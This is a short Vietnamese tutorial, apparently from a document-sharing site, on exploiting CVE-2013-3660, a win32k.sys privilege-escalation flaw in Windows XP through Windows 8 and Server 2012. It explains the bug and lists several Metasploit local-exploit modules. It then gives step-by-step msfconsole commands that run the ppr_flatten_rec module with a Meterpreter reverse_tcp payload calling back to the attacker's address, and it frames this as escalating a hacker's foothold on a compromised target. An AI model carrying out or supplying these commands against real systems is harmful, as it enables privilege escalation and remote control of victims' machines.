1. Trang chủ
  2. » Công Nghệ Thông Tin

Cách thức khai thác lỗ hổng CVE 2013 3660

2 546 2
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 2
Dung lượng 224,66 KB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

Việc khởi tạo giá trị con trỏ pointer không được thực hiện chính xác, tạo điều kiện cho khai thác truy xuất vào PATHRECORD và leo thang đặc quyền trên hệ thống bằng cách làm tràn phân tr

Trang 1

Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation

Tham khảo:

CVE-2013-3660

EDB-25912

OSVDB-93539

http://seclists.org/fulldisclosure/2013/May/91

Mô tả:

Trong khai thác này, hacker lợi dụng hàm EPATHOBJ::pprFlattenRec từ tập tin win32k.sys

trong Microsoft Windows XP SP2 và SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, và Windows RT Việc khởi tạo giá trị con trỏ (pointer) không được thực hiện chính xác, tạo điều kiện cho khai thác truy xuất vào PATHRECORD và leo thang đặc quyền trên hệ thống (bằng cách làm tràn phân trang bộ nhớ và thực hiện gọi hàm FlattenPath liên tục dẫn đến bof trên Windows)

Khai thác:

Giả sử máy tính của mục tiêu bị local thông qua các exploit như: MS08-067, Java bugs, Code execution

… thì quyền hạn mà hacker khai thác được có thể chỉ là Normal User trên hệ thống Windows Để thực hiện khai thác leo thang đặc quyền và vượt qua các cơ chế kiểm tra bảo mật trên các kiến trúc OS hiện đại, ta có thể tham khảo thêm các exploit sau:

exploit/windows/local/adobe_sandbox_adobecollabsync

exploit/windows/local/always_install_elevated

exploit/windows/local/ask

exploit/windows/local/bypassuac

exploit/windows/local/current_user_psexec

exploit/windows/local/ms10_092_schelevator

exploit/windows/local/ms11_080_afdjoinleaf

exploit/windows/local/novell_client_nicm

exploit/windows/local/novell_client_nwfs

exploit/windows/local/payload_inject

Để thực hiện khai thác “Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation”, ta thực hiện như sau:

msf > use exploit/windows/local/ppr_flatten_rec

msf exploit(ppr_flatten_rec) > show payloads

msf exploit(ppr_flatten_rec) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(ppr_flatten_rec) > set LHOST [MY IP ADDRESS]

msf exploit(ppr_flatten_rec) > set SESSION [INTEGER]

msf exploit(ppr_flatten_rec) > exploit

Ngày đăng: 03/07/2014, 10:58

TỪ KHÓA LIÊN QUAN

🧩 Sản phẩm bạn có thể quan tâm

w